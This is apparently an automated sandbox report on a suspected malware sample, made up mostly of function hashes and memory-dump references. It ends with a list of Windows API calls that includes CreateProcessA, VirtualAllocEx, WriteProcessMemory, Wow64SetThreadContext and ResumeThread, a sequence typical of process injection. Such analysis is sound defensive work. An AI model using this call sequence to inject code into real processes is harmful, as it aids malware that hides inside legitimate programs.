                        • Opcode Fuzzy Hash: c1f99f724d2f664781be54467843c6e81724e6bdb055094e5b9cec5bddea83dd
                        • Instruction Fuzzy Hash: 17F058B0D4922ADFEF54ABA8C4049FEBBF9EB4B301F004829942667250C7781D04CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e3518fa16afef495617cdfdc4754f71c442fa93225d186a7c8ab4938feebb875
                        • Instruction ID: c3a85d9bd2b35327782a6ccdb52702d494db1d13e09580bcee1825bdbd92cb9f
                        • Opcode Fuzzy Hash: e3518fa16afef495617cdfdc4754f71c442fa93225d186a7c8ab4938feebb875
                        • Instruction Fuzzy Hash: 5EE0DF301CD0B3CFBBC53ABC54551752F718B0B100B004066D18BCBD51D51D89A382F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 169b70e3b65fbdff6ec3ffc083898c8d32db8a8bfa4804cca39af1f79b3ec45f
                        • Instruction ID: af53292e3c8aefbda88a1c3a56a399548185e9b023525c2ff6678bbd2d11545d
                        • Opcode Fuzzy Hash: 169b70e3b65fbdff6ec3ffc083898c8d32db8a8bfa4804cca39af1f79b3ec45f
                        • Instruction Fuzzy Hash: 9DE09B70F44214EBE748AF6DC85896A7BB6DBC9350F108479E8067B784DE35AC02CBD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30ec40e86ce0d19742edf5f87a978ac4aa679ab1b6e191612faeb1e2d9bc9f90
                        • Instruction ID: d10195f664c6d7333d3b1abfda17e5da771f4cfdb25dc472d2c85ffb920149e9
                        • Opcode Fuzzy Hash: 30ec40e86ce0d19742edf5f87a978ac4aa679ab1b6e191612faeb1e2d9bc9f90
                        • Instruction Fuzzy Hash: E1F09DB8D09258CFCBA1CF28C880AECBBF5EB0D301F1042E9D45AA7712D63499568F04
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3262947a3ac790ef46f768e436ce274cd23803e0c3f487b31bff58c93edbfd9b
                        • Instruction ID: f7ce45929addaa3d208493c8942d8b7910e11e8c02170594947314422cfb4cc9
                        • Opcode Fuzzy Hash: 3262947a3ac790ef46f768e436ce274cd23803e0c3f487b31bff58c93edbfd9b
                        • Instruction Fuzzy Hash: 87F058B4D05229CFDB90CB29C84079DB7B5BF49204F0086D5C819A3341E3309E44CF52
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37913c0acc6b991b6159a2424a6356fa32c6be9f454e6a587007db8d52eccbcc
                        • Instruction ID: d6b674931f21d9b99c85429ec033310b99068cd0e6e5a70b181c891e2579e137
                        • Opcode Fuzzy Hash: 37913c0acc6b991b6159a2424a6356fa32c6be9f454e6a587007db8d52eccbcc
                        • Instruction Fuzzy Hash: 51E0DF7124D221AFEB426B4C94D043ABB78EF4722430084ABD40A8B246CC1ADE0383C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ba86bdaaa7f30071aa369aac4426c9abaf6afbad9a36edcd0d4084217986d1f2
                        • Instruction ID: 4f0c17691080cb9cac467940c506aeb8f32bf679abeaa479e2d556e9fbbf23b0
                        • Opcode Fuzzy Hash: ba86bdaaa7f30071aa369aac4426c9abaf6afbad9a36edcd0d4084217986d1f2
                        • Instruction Fuzzy Hash: C5F01574E0020CABDB55EFA8D50969CBBF2EB88301F0080A9E918A2340D6349A51DF41
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83a0294c07b2a6511b53617cc2a7cbabb51198c498c23693d243fa6dc951356b
                        • Instruction ID: 4ee4a0a0681d936377f9083b07e0c643b648aaa2d9f54ae5921753c0ebe918ff
                        • Opcode Fuzzy Hash: 83a0294c07b2a6511b53617cc2a7cbabb51198c498c23693d243fa6dc951356b
                        • Instruction Fuzzy Hash: 16D052312DC07BCF7FC8346E641823A6F3A874B200A008026A24BC6D40E82E89A000FA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4afd001fb9062189b28dddd426465c296310176fe980813d16abefb2d2603c39
                        • Instruction ID: 2846fdf20e9d7bf83dff66c3532b12fec665dc14f1b9ff8bb53bcab66847e81d
                        • Opcode Fuzzy Hash: 4afd001fb9062189b28dddd426465c296310176fe980813d16abefb2d2603c39
                        • Instruction Fuzzy Hash: BFF0F874D04229CFDB90DF29D884BA8BBF6FB45300F008596D00DA3214DB344D84CF51
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0299f9d011e1904df0eafd98b67c3b52ebceb25c1d2d65d2478777fde3dfbd1d
                        • Instruction ID: 2e05b2409dd23fac12d0a60542b3c8f30bbc2488d1d6dcf98bd52d3c710365c8
                        • Opcode Fuzzy Hash: 0299f9d011e1904df0eafd98b67c3b52ebceb25c1d2d65d2478777fde3dfbd1d
                        • Instruction Fuzzy Hash: 12D05B31248036AFAB44764CD490436F37DEF872547108057D50A5B345CD67EE02C7D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8f871145e5ebff343977317ac266f0d9b8c2140631a9050c8e5f5a6eb382e7f0
                        • Instruction ID: 8f8b3bd78e2dd3c30441010f127a17066f4d313b1d3a856e208b4e0cacf78e8f
                        • Opcode Fuzzy Hash: 8f871145e5ebff343977317ac266f0d9b8c2140631a9050c8e5f5a6eb382e7f0
                        • Instruction Fuzzy Hash: 89E04F7095560ACFEB40EB58C14469CBFBBEF89705B509519D006AB755D77098938F40
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 043e85def7dd70bb5eb9112e1db4e77ee0a461be131a8a14b683714783f786c4
                        • Instruction ID: c2bcaee27f70d1adefb9b44b88f85a2d8e7e474f94c4d2151a53daa157743fa8
                        • Opcode Fuzzy Hash: 043e85def7dd70bb5eb9112e1db4e77ee0a461be131a8a14b683714783f786c4
                        • Instruction Fuzzy Hash: E3D05EB1E8406A8F8F00EAACE4444ECBBB0EB4B211B004822C502E3504D3745815CA54
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: de8d77d92e733fa872ac8f818ad82d03546758fde9ee1109bf541e3fde354d3e
                        • Instruction ID: c09750b75679e8f1075306e7021db3536217b137af8757de141d78a5a8a0c7ad
                        • Opcode Fuzzy Hash: de8d77d92e733fa872ac8f818ad82d03546758fde9ee1109bf541e3fde354d3e
                        • Instruction Fuzzy Hash: A7E0E574944249CFCB44CFE8C89099CBBF2FF49350B108659D806AF349D735A906CF00
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65935739517d22aca86c6c496387955f4409a97e357155f5ea7f7896f8c01f39
                        • Instruction ID: ea802b0f427a8745d26331deea8026e8fb2b8af4816e31afea3fc52056486950
                        • Opcode Fuzzy Hash: 65935739517d22aca86c6c496387955f4409a97e357155f5ea7f7896f8c01f39
                        • Instruction Fuzzy Hash: C2D02B7048D155CFD361EB94D8103D83B709B06100B0540C2C40D5B962EA200F2DD7D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9e43988c23ded1073bb218d14440b6968a446008fa2aea83d20ee48e08bb237b
                        • Instruction ID: 48961ace0bfc5b0acd78bba6c26e5d24444cc27586edb4499abdf8776609e704
                        • Opcode Fuzzy Hash: 9e43988c23ded1073bb218d14440b6968a446008fa2aea83d20ee48e08bb237b
                        • Instruction Fuzzy Hash: 10E0C270E0020CDBDB04EFECE50935CBBB4EB4430AF0000A8D90867380CB345E51CB41
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06a3a51d5995c678429ffe76f03d6cc2daf8a0373a578de97110cff230385ca6
                        • Instruction ID: 3f80ba7a21ae44241d6d6b3075333ed97cdf15f8dfbfb335a283912ad1f6af92
                        • Opcode Fuzzy Hash: 06a3a51d5995c678429ffe76f03d6cc2daf8a0373a578de97110cff230385ca6
                        • Instruction Fuzzy Hash: 19D02370740032CF4B40BB64480453D77A6DEC2290336C015FC0283541DD36CC0141C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cd8f2212361f672004f4a8634b1faa8638b675276ec87ac3a7140c382b214dc6
                        • Instruction ID: 0db056622086a618f31a34e367598e5d6790f59fbef5082832776635dfcd5ac4
                        • Opcode Fuzzy Hash: cd8f2212361f672004f4a8634b1faa8638b675276ec87ac3a7140c382b214dc6
                        • Instruction Fuzzy Hash: E8D0A7A1D493C48FC30567E0B50D2107F20AB01502F044151E50D8A052E66C4D55C796
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04442ebc43f0a5e08fedc45fb421f029d77f6be4a7927b13411db4b91e4ad001
                        • Instruction ID: 01d0fa8c1d25c3be08d15e2b28add0f4d27d3ec5e11f8c42d967e569e45a2bbf
                        • Opcode Fuzzy Hash: 04442ebc43f0a5e08fedc45fb421f029d77f6be4a7927b13411db4b91e4ad001
                        • Instruction Fuzzy Hash: 43C08C7A00D2D01FCB836B609D458D53F32BB1B11432B40C3D0C8CA033951C8A1BD763
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e3070e936b60d0ea14de661241e4c4d528b317cd704d6ec0a9c1c0da582bcdd2
                        • Instruction ID: 80f8d6664effee6cb90dd42597485d6b78eefc9e90c4879e2e1e85c4552356f7
                        • Opcode Fuzzy Hash: e3070e936b60d0ea14de661241e4c4d528b317cd704d6ec0a9c1c0da582bcdd2
                        • Instruction Fuzzy Hash: 92D09278504264CFD394DB18D5589A87B7AFB0A216F0054D4A40F5BA21CB34DC80CF10
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2caf5416b814d710057129adf397962fdfe3622a26c82b87f2beab406d8aedfc
                        • Instruction ID: 9ce46118fd27c9b47bdf558dd3bdf9583d8f05a2425521f45fd26d1b06d81ded
                        • Opcode Fuzzy Hash: 2caf5416b814d710057129adf397962fdfe3622a26c82b87f2beab406d8aedfc
                        • Instruction Fuzzy Hash: ABC08C3048821EEBD7A0FAC9D90176CB3BC9700224F0001A6880D23A00CA311F20A2E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4d626876c7c355d9f4d866c65ee54df64934fadf9a2048ce09c04ca77a06e5f1
                        • Instruction ID: 3586ccc8bdf4dfb6bbf08d44589817cb1a79927a922ea6985ad865636f8b03f0
                        • Opcode Fuzzy Hash: 4d626876c7c355d9f4d866c65ee54df64934fadf9a2048ce09c04ca77a06e5f1
                        • Instruction Fuzzy Hash: CEC08CB09402898BC3142BE4B90E32436A8B700206F400010D60D820518B681CA4C7A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f6865144a7baf62ebb07f64b203ce65f47b9bad9d35b1c72bd2e21ca493c8cf8
                        • Instruction ID: abebf7d270a79464717e5c44ac856bfa4df4c8568e69e0a46b6487fc59deb33b
                        • Opcode Fuzzy Hash: f6865144a7baf62ebb07f64b203ce65f47b9bad9d35b1c72bd2e21ca493c8cf8
                        • Instruction Fuzzy Hash: E7C02B70740D27CF2764F66C42410576DF3F7E83003108435D093DA24CD420C70183A0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d300777f4aa6f06baf9314d0df6e5588304b64f925975e6afd42171c210fb6e1
                        • Instruction ID: 8143cf9cc26b74d317f6dcc266a8fea466dea0e9122af08cb4a7520f04375476
                        • Opcode Fuzzy Hash: d300777f4aa6f06baf9314d0df6e5588304b64f925975e6afd42171c210fb6e1
                        • Instruction Fuzzy Hash: EDD0EAB8E4821ACFDB40DF98E554AADB7B5FB49305F205015D46AA2280C7786E96CF80
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0429922d82c36d2217d728425a73310e1147889e611f0faf22b489ff703e6168
                        • Instruction ID: b3ee047769403290266c0bc415bcba0435766807de7a87a474f1a96f8cb91675
                        • Opcode Fuzzy Hash: 0429922d82c36d2217d728425a73310e1147889e611f0faf22b489ff703e6168
                        • Instruction Fuzzy Hash: 0CB012759FB653EBB280776C8D65E3AA590FBA1F00B60DC05730910010C420F476D16F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6cdfbbf3280dfdeed24734d73d3d87990cd09bb6eae60e649488bcc3ab9b9bf4
                        • Instruction ID: a58ae76a5f3787656482afb4d5690bd32ef62373f355cdb8c8fadc5d073d3afa
                        • Opcode Fuzzy Hash: 6cdfbbf3280dfdeed24734d73d3d87990cd09bb6eae60e649488bcc3ab9b9bf4
                        • Instruction Fuzzy Hash: DAB092315CE155CBEB821A28882E4643F79EF8670C31680C4994D6982BC9A28423DB89
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: &)m
                        • API String ID: 0-1624946986
                        • Opcode ID: bdab09f36819e420efd2559fde2f60b33156e37408317100439a440c1c68a68b
                        • Instruction ID: c6c5d4d33c9db0443d7198cd0a11db9a6dcf8b45b5e4d833f49c0bc58baa210a
                        • Opcode Fuzzy Hash: bdab09f36819e420efd2559fde2f60b33156e37408317100439a440c1c68a68b
                        • Instruction Fuzzy Hash: 9BE11E74E1021A8FDB14DF99C580AAEFBF2FF49305F248169D415AB356D730A982CFA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df3864d28322f24ec37525731ed696258d765f62208390819b09b0d9216b563f
                        • Instruction ID: 294f8f441646e7c627e7f87f5145fafe5e816cbbf3a81d735a56d238b6b6f918
                        • Opcode Fuzzy Hash: df3864d28322f24ec37525731ed696258d765f62208390819b09b0d9216b563f
                        • Instruction Fuzzy Hash: 2C1285B0C827458AE310CFA5F94C1893BB1BB45319BE04E09E261AB6E5DBF8117ACF54
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 800676690f6485327b802660066a4f09d9eb61ecbfff1ea636cacfce991be703
                        • Instruction ID: 65bd85e65ccf1882d68126f3e71f980983017bcedde386075bde53bae1fc9c72
                        • Opcode Fuzzy Hash: 800676690f6485327b802660066a4f09d9eb61ecbfff1ea636cacfce991be703
                        • Instruction Fuzzy Hash: 13E11C74E002198FDB54DFA9C580AAEFBF2FF89305F248169D455AB356D730A981CFA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7bc2fbb5af23df3d6c5476b7ea50bac85c1693da61da542acba5c1a3174300ed
                        • Instruction ID: 7004721f70cefa6eeab9177966778dc540e671834d72b3c71c7a3a194c4fd337
                        • Opcode Fuzzy Hash: 7bc2fbb5af23df3d6c5476b7ea50bac85c1693da61da542acba5c1a3174300ed
                        • Instruction Fuzzy Hash: 38E1FA74E102198FDB14DFA9C5809AEFBF2FF89305F248169D414AB356D731A982CFA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd8368c7d035d2c2ebf905ffda3c8bc5fc0bcdab12692e5e1a64933cb0ffc630
                        • Instruction ID: 9fa3f2a2526460b58d4909e627f0573ff0059786c122f309c975232405b1e0e9
                        • Opcode Fuzzy Hash: dd8368c7d035d2c2ebf905ffda3c8bc5fc0bcdab12692e5e1a64933cb0ffc630
                        • Instruction Fuzzy Hash: 64E10C74E102198FDB54EFA9C5809AEFBF2FF89305F248169D414AB356D730A942CFA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 27184ac72edf87d9a939c1bc3713ffe10f8cac4dbaf070f3e2396f87c3162e6a
                        • Instruction ID: 2fd811a70f38e3ee6126a77630f7f19401ca0bc0abd4a8623eda7078eb50571d
                        • Opcode Fuzzy Hash: 27184ac72edf87d9a939c1bc3713ffe10f8cac4dbaf070f3e2396f87c3162e6a
                        • Instruction Fuzzy Hash: D0D10631D1075A8EDB10EB64D950A99F7B1FF96300F10879AE50A3B225FB70AAD5CB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3dcd1810cf4d9b7b79f4d9347cd1518ee8307de34216e9ec40ec4fa89d114784
                        • Instruction ID: 3ff8480f6a134f28ee20e66a52f9cf6d051e0ab1b42e505f7c9c50665bad6584
                        • Opcode Fuzzy Hash: 3dcd1810cf4d9b7b79f4d9347cd1518ee8307de34216e9ec40ec4fa89d114784
                        • Instruction Fuzzy Hash: 10D1F631D1075A8EDB10EB64D950A99F7B1FF96300F10C79AE50A3B225FB70AAD5CB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5fe7bbadcfac76033ce8a64088013a5f28563c54e4ca18338a29385fc8268d1
                        • Instruction ID: d59d090e4c9c6d8ae3a71a3bd8a5776c0335e87b556dc7dbeba09fef9f340b20
                        • Opcode Fuzzy Hash: f5fe7bbadcfac76033ce8a64088013a5f28563c54e4ca18338a29385fc8268d1
                        • Instruction Fuzzy Hash: C9A18E32E00225CFCF06DFB6C8405AEB7B2FF85305B15857AE805AB211DBB5E955CB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b89f707062734d09dd16ea9bfd3b34d89d3677c55293f8672e77c05250f62087
                        • Instruction ID: d9353a129294e9a2198cd0e9e6b9f457dcf2cf767a83fe62a31e0bc359d28325
                        • Opcode Fuzzy Hash: b89f707062734d09dd16ea9bfd3b34d89d3677c55293f8672e77c05250f62087
                        • Instruction Fuzzy Hash: D4C1D5B0C827458AD714CFA5F84C1897BB1BB85325BA14F09E261AB6E0DBF8147ACF54
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 87c2149e44a2dc782add5af279a4e5b5a76d98ad47a70fd26f78b44d98594244
                        • Instruction ID: 2e49f0a2a259ed5e11b0c1a5761a1081389287c80d509ee42f5f3f950ecd2af4
                        • Opcode Fuzzy Hash: 87c2149e44a2dc782add5af279a4e5b5a76d98ad47a70fd26f78b44d98594244
                        • Instruction Fuzzy Hash: 6171FC74E002198FDB14DFA9C5819AEFBF2FF89314F24816AD418AB356D7319981CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b0cc73ac36f73d2f8854f80283f4089b00cc6b2c813a8dc31c8c93d08dea7d98
                        • Instruction ID: 60717728281e1c013e6ade58aa0ea5dcde3d60a44e74b81a9b145415fe10a541
                        • Opcode Fuzzy Hash: b0cc73ac36f73d2f8854f80283f4089b00cc6b2c813a8dc31c8c93d08dea7d98
                        • Instruction Fuzzy Hash: 73511C74E042198FDB14DFA9C5805AEFBF2FF89304F24816AD458AB356D7319941CFA1

                        Execution Graph

                        Execution Coverage:8.6%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:253
                        Total number of Limit Nodes:14
                        Nodes of the execution graph that resolve to a Windows API call, listed by node address and grouped by memory region (nodes that the graph only summarises as "N API calls" are omitted):

                        Region 0159xxxx:
                        • 159b888, 159c2c8: LoadLibraryExW
                        • 159c088: GetModuleHandleW
                        • 159e258: DuplicateHandle
                        • 159dc4e, 159dcdd: GetCurrentProcess
                        • 159dca0: GetCurrentThread
                        • 159dd13: GetCurrentThreadId
                        • 1591fb8, 1593420: CreateActCtxA

                        Regions 0572xxxx and 057Fxxxx:
                        • 5722718: CreateWindowExW
                        • 5724cea: CallWindowProcW
                        • 5724c7e: CallWindowProcW (three calls)
                        • 57f635c, 57fba5f: GetCurrentThreadId

                        Region 07ABxxxx:
                        • 7ab0f26: CreateProcessA
                        • 7ab09f0, 7ab0a30: VirtualAllocEx
                        • 7ab0aaa, 7ab0ab0, 7ab0af8: WriteProcessMemory
                        • 7ab0ba0, 7ab0beb: ReadProcessMemory
                        • 7ab0910, 7ab0918, 7ab095d: Wow64SetThreadContext
                        • 7ab0860, 7ab0868, 7ab08a8: ResumeThread
                        • 7ab4930: PostMessageW

